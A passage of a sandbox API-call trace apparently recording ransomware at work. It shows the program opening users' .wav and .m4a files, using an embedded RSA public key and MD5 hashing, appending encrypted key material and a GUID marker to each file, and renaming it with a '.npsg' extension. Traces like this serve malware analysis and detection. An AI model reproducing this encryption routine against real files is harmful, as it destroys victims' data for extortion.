(pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\ta622997O.wav") returned=".wav" [0239.007] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\ta622997O.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\ta622997o.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.008] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=86916) returned 1 [0239.008] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.012] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1535e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.012] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.014] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x15384, lpOverlapped=0x0) returned 1 [0239.015] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.015] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.015] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.015] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0239.016] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.016] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.016] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.016] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.016] GetLastError () returned 0x0 [0239.016] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.017] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0239.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.017] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.017] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.017] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.017] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c68 | out: hHeap=0x620000) returned 1 [0239.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c80 | out: hHeap=0x620000) returned 1 [0239.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cc8 | out: hHeap=0x620000) returned 1 [0239.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cc8 [0239.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0239.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c80 [0239.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400c68 [0239.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0239.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0239.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0239.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c80 | out: hHeap=0x620000) returned 1 [0239.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c68 | out: hHeap=0x620000) returned 1 [0239.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0239.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cc8 | out: hHeap=0x620000) returned 1 [0239.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0239.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.019] GetCurrentThreadId () returned 0x5b4 [0239.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0239.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b87948 [0239.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0239.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.019] GetCurrentThreadId () returned 0x5b4 [0239.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0239.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cc8 [0239.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0239.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c68 [0239.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0239.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0239.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0239.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0239.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c80 [0239.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0239.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0239.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0239.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c50 [0239.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0239.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400ce0 [0239.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0239.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0239.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400cb0 [0239.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400c98 [0239.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400cf8 [0239.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c98 | out: hHeap=0x620000) returned 1 [0239.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c98 [0239.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400cb0 | out: hHeap=0x620000) returned 1 [0239.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0239.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0239.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0239.023] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x15384, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.023] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.023] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.023] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.023] CloseHandle (hObject=0x644) returned 1 [0239.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0239.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b88cd0 [0239.026] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\ta622997O.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\ta622997o.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\ta622997O.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\ta622997o.wav.npsg")) returned 1 [0239.028] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x535789d0, ftCreationTime.dwHighDateTime=0x1d5bcc6, ftLastAccessTime.dwLowDateTime=0x1d008af0, ftLastAccessTime.dwHighDateTime=0x1d5bc2e, ftLastWriteTime.dwLowDateTime=0x1d008af0, ftLastWriteTime.dwHighDateTime=0x1d5bc2e, nFileSizeHigh=0x0, nFileSizeLow=0x10103, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U5upCFkkWLgS8Bd.m4a", cAlternateFileName="U5UPCF~1.M4A")) returned 1 [0239.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0239.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0239.028] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\U5upCFkkWLgS8Bd.m4a") returned=".m4a" [0239.028] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\--nHV1eb\\U5upCFkkWLgS8Bd.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\--nhv1eb\\u5upcfkkwlgs8bd.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.028] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=65795) returned 1 [0239.028] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.031] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x100dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.032] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.034] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x10103, lpOverlapped=0x0) returned 1 [0239.035] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.035] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.035] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.035] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0239.036] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.036] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.036] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.036] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.036] GetLastError () returned 0x0 [0239.037] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.037] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0239.037] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.037] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.037] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.037] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c80 | out: hHeap=0x620000) returned 1 [0239.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c98 | out: hHeap=0x620000) returned 1 [0239.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ce0 | out: hHeap=0x620000) returned 1 [0239.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400ce0 [0239.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0239.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400c98 [0239.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0239.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400c80 [0239.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0239.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0239.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0239.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c98 | out: hHeap=0x620000) returned 1 [0239.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400c80 | out: hHeap=0x620000) returned 1 [0239.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400ce0 | out: hHeap=0x620000) returned 1 [0239.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0239.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.039] GetCurrentThreadId () returned 0x5b4 [0239.039] RtlAllocateHeap (HeapHandle=0x620000, 